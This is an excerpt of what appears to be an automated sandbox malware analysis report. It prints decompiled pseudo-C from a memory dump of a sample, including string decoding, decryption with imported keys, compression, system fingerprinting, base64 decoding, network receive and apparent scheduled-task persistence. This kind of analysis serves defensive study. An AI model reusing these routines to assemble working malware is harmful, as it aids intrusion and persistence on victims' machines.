    							_t98 = _t130[0] >> 4;
    							goto L27;
    						}
    						if(_t94 == 0x10) {
    							_t131 = 5;
    							_t132 = _t119 + _t85 / _t131;
    							_t64 = _t132[0] >> 1;
    							_t98 =  *_t132 << 4;
    							goto L27;
    						}
    						if(_t94 == 0x18) {
    							_t133 = 5;
    							_t134 = _t119 + _t85 / _t133;
    							_t64 = (_t134[0] >> 3) + (_t134[0] << 2);
    							_t98 =  *_t134 << 7;
    							goto L27;
    						}
    						if(_t94 == 0x20) {
    							_t135 = 5;
    							 *((char*)(_t89 + _a4)) = ( *(_t119 + _t85 / _t135) << 5) +  *((intOrPtr*)(_t85 / _t135 + _t119 + 1));
    						}
    						L28:
    						_t85 = _t85 + 8;
    						_t89 = _t89 + 1;
    					} while (_t85 < _v12);
    					goto L29;
    				}
    				_t91 = _a8;
    				_t117 = _t119 - _t91;
    				do {
    					_t81 =  *_t91;
    					if(_t81 <= 0x60 || _t81 >= 0x7b) {
    						if(_t81 <= 0x31 || _t81 >= 0x38) {
    							if(_t81 <= 0x40 || _t81 >= 0x5b) {
    								_t124 = 0;
    								goto L22;
    							} else {
    								_t82 = _t81 - 0x41;
    								goto L13;
    							}
    						} else {
    							_t82 = _t81 - 0x18;
    							goto L13;
    						}
    					} else {
    						_t82 = _t81 - 0x61;
    					}
    					L13:
    					_v8 = _v8 + 1;
    					 *((char*)(_t117 + _t91)) = _t82;
    					_t91 = _t91 + 1;
    				} while (_v8 < _t84);
    				goto L14;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 53%
    			E003C76E0(void* _a4, int _a8, void* _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
    				char _v8;
    				char _v12;
    				int _v16;
    				int _v20;
    				char _v24;
    				void _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				char _v68;
    				char _t42;
    				intOrPtr _t43;
    				intOrPtr _t46;
    				void* _t50;
    				intOrPtr _t55;
    				void* _t63;
    				intOrPtr _t64;
    				intOrPtr _t67;
    				intOrPtr _t71;
    				intOrPtr _t81;
    				intOrPtr _t84;
    				int _t94;
    
    				_t64 =  *0x3e8628; // 0x622508
    				_push(0xf0000000);
    				_t63 = 0;
    				_push(0x18);
    				_push(0);
    				_push(0);
    				_v12 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				_push( &_v12);
    				_v20 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x180))))() == 0) {
    					L9:
    					_t42 = _v8;
    					if(_t42 != 0) {
    						_t67 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x15c))))(_t42);
    					}
    					_t43 = _v12;
    					if(_t43 != 0) {
    						_t46 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x178))))(_t43, 0);
    					}
    					 *_a20 = _t63;
    					 *_a24 = _v16;
    					return _v20;
    				}
    				_v68 = 0x208;
    				_v64 = 0x6610;
    				_v60 = 0x20;
    				_t12 = _t63 + 8; // 0x8
    				_t50 = memcpy( &_v56, _a12, _t12 << 2);
    				_push( &_v8);
    				_t71 =  *0x3e8628; // 0x622508
    				_push(1);
    				_push(0);
    				_push(0x2c);
    				_push( &_v68);
    				_push(_t50);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x170))))() != 0) {
    					_t81 =  *0x3e8628; // 0x622508
    					_push(0);
    					_push( &_v24);
    					_push(4);
    					_v24 = 1;
    					_push(_v8);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x17c))))() != 0) {
    						_t55 =  *0x3e8628; // 0x622508
    						_push(0);
    						_push(_a16);
    						_push(1);
    						_push(_v8);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x17c))))() != 0) {
    							_t94 = _a8;
    							_t63 = E003D1D90(_t94, 0);
    							if(_t63 != 0) {
    								memcpy(_t63, _a4, _t94);
    								_t84 =  *0x3e8628; // 0x622508
    								_push( &_v16);
    								_push(_t63);
    								_push(0);
    								_push(1);
    								_push(0);
    								_v16 = _t94;
    								_push(_v8);
    								if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x168))))() == 0) {
    									E003CBB40(_t63);
    									_t63 = 0;
    								} else {
    									_v20 = 1;
    								}
    							}
    						}
    					}
    				}
    				goto L9;
    			}


    APIs
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • memcpy.MSVCRT ref: 003C77B9
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003D1FE0(void* __eax, signed char* _a4, void* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				unsigned int _v8;
    				signed char* _v12;
    				unsigned int _v16;
    				intOrPtr _v20;
    				void _v24;
    				int _v28;
    				signed char _v32;
    				signed int _t98;
    				signed char _t105;
    				void* _t108;
    				signed char _t109;
    				signed char _t121;
    				signed char _t122;
    				intOrPtr _t123;
    				unsigned int _t124;
    				unsigned int _t125;
    				signed char _t127;
    				signed char _t132;
    				unsigned int _t135;
    				int _t139;
    				signed int _t141;
    				unsigned int _t143;
    				signed char* _t145;
    				signed char* _t146;
    				void* _t148;
    				void _t149;
    				signed char** _t157;
    				unsigned int _t159;
    				unsigned int _t160;
    				unsigned int _t162;
    				signed char _t164;
    				signed char _t165;
    				signed char _t166;
    				void _t168;
    				intOrPtr _t171;
    				intOrPtr _t174;
    				unsigned int _t176;
    				unsigned int _t177;
    				signed char* _t179;
    				int _t189;
    				int _t193;
    				unsigned int _t195;
    				signed char* _t196;
    				signed char* _t197;
    				signed char* _t198;
    				void* _t199;
    				char* _t201;
    				void* _t202;
    
    				_t199 = _a8;
    				_t196 = _a4;
    				_v12 = _t196;
    				_v20 = _t196 + __eax;
    				_t197 = _t196 + 4;
    				do {
    					_t174 = _a16;
    					_t98 = ((((_t197[3] & 0x000000ff) << 0x00000006 ^ _t197[2] & 0x000000ff) << 0x00000005 ^ _t197[1] & 0x000000ff) << 0x00000005 ^  *_t197 & 0x000000ff) + (((((_t197[3] & 0x000000ff) << 0x00000006 ^ _t197[2] & 0x000000ff) << 0x00000005 ^ _t197[1] & 0x000000ff) << 0x00000005 ^  *_t197 & 0x000000ff) << 0x00000005) >> 0x00000005 & 0x00003fff;
    					_t145 =  *(_t174 + _t98 * 4);
    					_t157 = _t174 + _t98 * 4;
    					if(_t145 < _a4) {
    						L49:
    						 *_t157 = _t197;
    						_t197 =  &(_t197[1]);
    						goto L50;
    					}
    					_t176 = _t197 - _t145;
    					_v8 = _t176;
    					_t177 = _t176 - 1;
    					_v24 = _t197;
    					_v16 = _t177;
    					if(_t177 > 0xbffe) {
    						goto L49;
    					}
    					if(_v8 <= 0x800 || _t145[3] == _t197[3]) {
    						L9:
    						if( *_t145 !=  *_t197 || _t145[2] != _t197[2]) {
    							goto L49;
    						} else {
    							_t179 = _v12;
    							_t105 = _t197 - _t179;
    							 *_t157 = _t197;
    							if(_t105 <= 0) {
    								L23:
    								_t198 =  &(_t197[4]);
    								if(_t145[3] != _t197[3]) {
    									L43:
    									_t159 = _v8;
    									_t197 = _t198 - 1;
    									_t108 = _t197 - _t179;
    									if(_t159 > 0x800) {
    										_t109 = _t108 - 2;
    										if(_t159 > 0x4000) {
    											_t160 = _t159 - 0x4000;
    											 *_t199 = _t160 >> 0x0000000b & 0x00000008 | _t109 | 0x00000010;
    										} else {
    											_t160 = _v16;
    											_v8 = _t160;
    											 *_t199 = _t109 | 0x00000020;
    										}
    										L48:
    										_t201 = _t199 + 1;
    										 *_t201 = _t160 + _t160 + _t160 + _t160;
    										 *((char*)(_t201 + 1)) = _t160 >> 6;
    										_t199 = _t201 + 2;
    										_v12 = _t197;
    										goto L50;
    									}
    									_t162 = _v16;
    									 *_t199 = (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007) + (_t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 + _t108 - 0x00000001 | _t162 & 0x00000007);
    									 *(_t199 + 1) = _t162 >> 3;
    									_t199 = _t199 + 2;
    									_v12 = _t197;
    									goto L50;
    								}
    								_t164 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[4] != _t164) {
    									goto L43;
    								}
    								_t121 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[5] != _t121) {
    									goto L43;
    								}
    								_t165 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[6] != _t165) {
    									goto L43;
    								}
    								_t122 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[7] != _t122) {
    									goto L43;
    								}
    								_t166 =  *_t198;
    								_t198 =  &(_t198[1]);
    								if(_t145[8] != _t166) {
    									goto L43;
    								}
    								_t123 = _v20;
    								_t146 =  &(_t145[9]);
    								if(_t198 >= _t123) {
    									L32:
    									_t124 = _v8;
    									_t148 = _t198 - _v12;
    									if(_t124 > 0x4000) {
    										_t125 = _t124 - 0x4000;
    										_v8 = _t125;
    										_t127 = _t125 >> 0x0000000b & 0x00000008;
    										if(_t148 > 9) {
    											_t149 = _t148 - 9;
    											 *_t199 = _t127 | 0x00000010;
    											L39:
    											_t199 = _t199 + 1;
    											if(_t149 <= 0xff) {
    												L42:
    												_t160 = _v8;
    												 *_t199 = _t149;
    												goto L48;
    											}
    											_t67 = _t149 - 0x100; // -285
    											_t189 = (0x80808081 * _t67 >> 0x20 >> 7) + 1;
    											_v32 = _t189;
    											memset(_t199, 0, _t189);
    											_t132 = _v32;
    											_t202 = _t202 + 0xc;
    											_t199 = _t199 + _t132;
    											do {
    												_t149 = _t149 - 0xff;
    												_t132 = _t132 - 1;
    											} while (_t132 != 0);
    											goto L42;
    										}
    										_t160 = _v8;
    										 *_t199 = _t127 | _t148 - 0x00000002 | 0x00000010;
    										goto L48;
    									}
    									_t135 = _v16;
    									_v8 = _t135;
    									if(_t148 > 0x21) {
    										_t149 = _t148 - 0x21;
    										 *_t199 = 0x20;
    										goto L39;
    									}
    									 *_t199 = _t148 - 0x00000002 | 0x00000020;
    									_t160 = _t135;
    									goto L48;
    								}
    								while( *_t146 ==  *_t198) {
    									_t198 =  &(_t198[1]);
    									_t146 =  &(_t146[1]);
    									if(_t198 < _t123) {
    										continue;
    									}
    									goto L32;
    								}
    								goto L32;
    							}
    							_v32 = _t105;
    							if(_t105 > 3) {
    								if(_t105 > 0x12) {
    									_t39 = _t105 - 0x12; // -18
    									_t168 = _t39;
    									 *_t199 = 0;
    									_t199 = _t199 + 1;
    									_v24 = _t168;
    									if(_t168 <= 0xff) {
    										L20:
    										 *_t199 = _t168;
    										_t199 = _t199 + 1;
    										do {
    											L21:
    											 *_t199 =  *_t179;
    											_t199 = _t199 + 1;
    											_t179 = _t179 + 1;
    											_t105 = _t105 - 1;
    										} while (_t105 != 0);
    										_v12 = _t179;
    										goto L23;
    									}
    									_t193 = (0x80808081 * (_t168 + 0xffffff00) >> 0x20 >> 7) + 1;
    									_v28 = _t193;
    									memset(_t199, 0, _t193);
    									_t139 = _v28;
    									_t202 = _t202 + 0xc;
    									_t199 = _t199 + _t139;
    									do {
    										_v24 = _v24 - 0xff;
    										_t139 = _t139 - 1;
    									} while (_t139 != 0);
    									_t179 = _v12;
    									_t168 = _v24;
    									_t105 = _v32;
    									goto L20;
    								}
    								_t38 = _t105 - 3; // -3
    								_t168 = _t38;
    								goto L20;
    							}
    							 *(_t199 - 2) =  *(_t199 - 2) | _t105;
    							goto L21;
    						}
    					} else {
    						_t171 = _a16;
    						_t141 = _t98 & 0x000007ff ^ 0x0000201f;
    						_t145 =  *(_t171 + _t141 * 4);
    						_t157 = _t171 + _t141 * 4;
    						if(_t145 < _a4) {
    							goto L49;
    						}
    						_t143 = _t197 - _t145;
    						_t27 = _t143 - 1; // -1
    						_t195 = _t27;
    						_v8 = _t143;
    						_v16 = _t195;
    						if(_t195 > 0xbffe || _t143 > 0x800 && _t145[3] != _t197[3]) {
    							goto L49;
    						} else {
    							goto L9;
    						}
    					}
    					L50:
    				} while (_t197 < _v20 + 0xfffffff3);
    				 *_a12 = _t199 - _a8;
    				return _v20 - _v12;
    			}


    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 85%
    			E003C4A10(void* __eflags) {
    				short _v40;
    				char _v42;
    				signed short _v48;
    				signed int _v316;
    				intOrPtr _v320;
    				char _v324;
    				char _v524;
    				char _v624;
    				char _v824;
    				char _v1024;
    				_Unknown_base(*)()* _t51;
    				intOrPtr _t53;
    				void* _t54;
    				void* _t62;
    				signed int _t72;
    				signed int _t73;
    				intOrPtr _t83;
    				intOrPtr _t84;
    				intOrPtr _t86;
    				void* _t100;
    
    				_t84 =  *0x3e8628; // 0x622508
    				_v324 = 0x11c;
    				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xfc))))( &_v324);
    				E003C9090(__eflags,  &_v524, 0x6c);
    				E003C6CB0( &_v624, 0xb5);
    				_t86 =  *0x3e8628; // 0x622508
    				_t51 = GetProcAddress( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x24))))( &_v624),  &_v524);
    				if(_t51 == 0) {
    					_t83 =  *0x3e8628; // 0x622508
    					_t51 =  *(_t83 + 0x3c);
    				}
    				 *_t51( &_v40);
    				_t53 = _v320;
    				if(_t53 != 0xa) {
    					__eflags = _t53 - 6;
    					if(_t53 != 6) {
    						__eflags = _t53 - 5;
    						if(__eflags != 0) {
    							L19:
    							_t54 = 0x56;
    							L20:
    							E003C9090(_t112,  &_v524, _t54 + 1);
    							E003C9090(_v40 - 9,  &_v1024, (0 | _v40 != 0x00000009) + 0x58);
    							_t62 = E003D1D90(0x100, 0);
    							_t100 = _t62;
    							if(_t100 != 0) {
    								__eflags = _v48;
    								if(__eflags == 0) {
    									E003C9090(__eflags,  &_v824, 0xc);
    									_push( &_v1024);
    									E003D0C10(_t100, 0x100,  &_v824,  &_v524);
    									return _t100;
    								} else {
    									E003C9090(__eflags,  &_v824, 0x5a);
    									_push(_v48 & 0x0000ffff);
    									_push( &_v1024);
    									E003D0C10(_t100, 0x100,  &_v824,  &_v524);
    									return _t100;
    								}
    							} else {
    								return _t62;
    							}
    						}
    						_t72 = _v316;
    						__eflags = _t72 - 2;
    						if(__eflags != 0) {
    							__eflags = _t72 - 1;
    							if(__eflags != 0) {
    								__eflags = _t72;
    								_t54 = 0x55;
    								if(__eflags == 0) {
    									goto L20;
    								}
    								goto L19;
    							}
    							_t54 = 0x54;
    							goto L20;
    						}
    						_t54 = 0x53;
    						goto L20;
    					}
    					_t73 = _v316;
    					__eflags = _t73 - 3;
    					if(_t73 != 3) {
    						__eflags = _t73 - 2;
    						if(_t73 != 2) {
    							__eflags = _t73 - 1;
    							if(_t73 != 1) {
    								__eflags = _t73;
    								if(__eflags != 0) {
    									goto L19;
    								}
    								__eflags = _v42 - 1;
    								_t54 = (_t73 & 0xffffff00 | __eflags == 0x00000000) + 0x51;
    								goto L20;
    							}
    							__eflags = _v42 - 1;
    							_t54 = (0 | __eflags == 0x00000000) + 0x4f;
    							goto L20;
    						}
    						__eflags = _v42 - 1;
    						_t54 = (0 | __eflags == 0x00000000) + 0x4d;
    						goto L20;
    					}
    					__eflags = _v42 - 1;
    					_t54 = (0 | __eflags == 0x00000000) + 0x4b;
    					goto L20;
    				}
    				_t112 = _v42 - 1;
    				_t54 = (0 | _v42 == 0x00000001) + 0x49;
    				goto L20;
    			}


    APIs
    • GetProcAddress.KERNEL32(00000000), ref: 003C4A74
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
    • recv.WS2_32(?,00000000,003DF7A5,00000000), ref: 003DF519
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 86%
    			E003D5853(void* __ecx, char* _a4, BYTE* _a8) {
    				int _v8;
    				intOrPtr* _t8;
    				signed int _t10;
    				intOrPtr _t15;
    				void* _t18;
    
    				_t8 = _a4;
    				_v8 = 0x400;
    				_t18 = _t8 + 1;
    				do {
    					_t15 =  *_t8;
    					_t8 = _t8 + 1;
    				} while (_t15 != 0);
    				_t10 = CryptStringToBinaryA(_a4, _t8 - _t18, 0, _a8,  &_v8, 0, 0);
    				asm("sbb eax, eax");
    				return  ~_t10 & _v8;
    			}


    APIs
    • CryptStringToBinaryA.CRYPT32(?,?,00000000,?,00000400,00000000,00000000), ref: 003D587E
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 87%
    			E003D3933(int __eax, void* __ecx, char* _a4, BYTE* _a8) {
    				int _v8;
    				intOrPtr* _t9;
    				signed int _t11;
    				void* _t15;
    				intOrPtr _t17;
    
    				_v8 = __eax;
    				_t9 = _a4;
    				_t3 = _t9 + 1; // 0x1
    				_t15 = _t3;
    				do {
    					_t17 =  *_t9;
    					_t9 = _t9 + 1;
    				} while (_t17 != 0);
    				_t11 = CryptStringToBinaryA(_a4, _t9 - _t15, 1, _a8,  &_v8, 0, 0);
    				asm("sbb eax, eax");
    				return  ~_t11 & _v8;
    			}


    APIs
    • CryptStringToBinaryA.CRYPT32(00000000,00000001,00000001,00000000,?,00000000,00000000), ref: 003D395A
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 93%
    			E003C1440(intOrPtr* __ecx, void* __eflags) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				short _v24;
    				char _v28;
    				char _v32;
    				short _v44;
    				short _v48;
    				short _v56;
    				intOrPtr _v60;
    				short _v72;
    				short _v74;
    				short _v76;
    				void _v80;
    				char _v280;
    				intOrPtr* _t64;
    				void* _t66;
    				intOrPtr* _t68;
    				intOrPtr* _t69;
    				intOrPtr* _t70;
    				intOrPtr* _t71;
    				intOrPtr* _t81;
    				intOrPtr* _t85;
    				intOrPtr* _t86;
    				intOrPtr* _t87;
    				intOrPtr* _t89;
    				intOrPtr* _t93;
    				intOrPtr* _t95;
    				intOrPtr* _t97;
    				intOrPtr* _t98;
    				intOrPtr* _t100;
    				intOrPtr* _t101;
    				intOrPtr* _t102;
    				intOrPtr* _t103;
    				intOrPtr* _t105;
    				intOrPtr* _t108;
    				intOrPtr _t114;
    				intOrPtr* _t152;
    				void* _t154;
    				void* _t155;
    				void* _t156;
    
    				_t152 = __ecx;
    				_v8 = 0;
    				_v16 = 0;
    				_v20 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_t108 = 0;
    				_v28 = 0;
    				E003C9090(__eflags,  &_v280, 0x24);
    				_t64 =  *_t152;
    				_t155 = _t154 + 8;
    				_t66 =  *((intOrPtr*)( *((intOrPtr*)( *_t64 + 0x20))))(_t64,  &_v280, 0x3e613c, 0x3e611c,  &_v8);
    				if(_t66 >= 0) {
    					E003C8030( &_v12);
    					_t156 = _t155 + 4;
    					__eflags = _v12;
    					if(_v12 != 0) {
    						_v28 = 0x101;
    						_t108 = E003D1D90(0x202, 0);
    						_t156 = _t156 + 8;
    						__eflags = _t108;
    						if(_t108 != 0) {
    							_t114 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x138))))(_t108,  &_v28);
    							_t81 = _v8;
    							__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x80))))(_t81, _v12);
    							if(__eflags >= 0) {
    								E003C9090(__eflags,  &_v280, 0x14);
    								_t85 = _v8;
    								_t156 = _t156 + 8;
    								_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x50))))(_t85,  &_v280);
    								__eflags = _t86;
    								if(_t86 >= 0) {
    									_t87 = _v8;
    									_t89 =  *((intOrPtr*)( *((intOrPtr*)( *_t87 + 0xc))))(_t87,  &_v32,  &_v20);
    									__eflags = _t89;
    									if(_t89 >= 0) {
    										memset( &_v80, 0, 0x30);
    										_v80 = 0x30;
    										_v76 = 0x7e1;
    										_v72 = 1;
    										_v44 = 1;
    										_t93 = _v20;
    										_t156 = _t156 + 0xc;
    										_v74 = 1;
    										_v60 = 0x5a0;
    										_v56 = 1;
    										_v48 = 1;
    										_t95 =  *((intOrPtr*)( *((intOrPtr*)( *_t93 + 0xc))))(_t93,  &_v80);
    										__eflags = _t95;
    										if(_t95 >= 0) {
    											__eflags = _t97;
    											if(_t97 >= 0) {
    												_t98 = _v8;
    												_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t98))))(_t98, 0x3e60a0,  &_v16);
    												__eflags = _t100;
    												if(_t100 >= 0) {
    													_t101 = _v16;
    													_t102 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x18))))(_t101, 0, 1);
    													__eflags = _t102 - 0x80070005;
    													if(_t102 == 0x80070005) {
    														_t103 = _v8;
    														 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 0x78))))(_t103, _t108, 0);
    														_t105 = _v16;
    														_t102 =  *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x18))))(_t105, 0, 1);
    													}
    													__eflags = _t102;
    													if(_t102 >= 0) {
    														_v24 = 1;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					_t68 = _v20;
    					__eflags = _t68;
    					if(_t68 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t68 + 8))))(_t68);
    					}
    					_t69 = _v8;
    					__eflags = _t69;
    					if(_t69 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t69 + 8))))(_t69);
    					}
    					_t70 = _v16;
    					__eflags = _t70;
    					if(_t70 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
    					}
    					_t71 = _v12;
    					__eflags = _t71;
    					if(_t71 != 0) {
    						E003CBB40(_t71);
    						_t156 = _t156 + 4;
    					}
    					__eflags = _t108;
    					if(_t108 != 0) {
    						E003CBB40(_t108);
    					}
    					return _v24;
    				} else {
    					return 0 | _t66 == 0x80070050;
    				}
    			}


    APIs
    • memset.MSVCRT ref: 003C1559
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 95%
    			E003D0C80(void* __ecx) {
    				char _v8;
    				char _v12;
    				signed int _v16;
    				intOrPtr _t41;
    				intOrPtr _t47;
    				void* _t50;
    				intOrPtr _t59;
    				void* _t65;
    				signed int _t66;
    				signed int _t67;
    				void* _t68;
    				void* _t69;
    				void* _t71;
    
    				_t65 = __ecx;
    				_t1 = _t65 + 0x28; // 0xf003e85
    				_t29 =  *_t1;
    				_t67 = 0;
    				_v12 = 0;
    				_v8 = 0x288;
    				_v16 = 0;
    				if( *_t1 != 0) {
    					E003CBB40(_t29);
    					_t68 = _t68 + 4;
    					 *((intOrPtr*)(__ecx + 0x28)) = 0;
    				}
    				_t50 = E003D1D90(_v8, _t67);
    				_t69 = _t68 + 8;
    				if(_t50 == _t67) {
    					L12:
    					_t66 = _t67;
    					goto L13;
    				} else {
    					_t59 =  *0x3e8628; // 0x622508
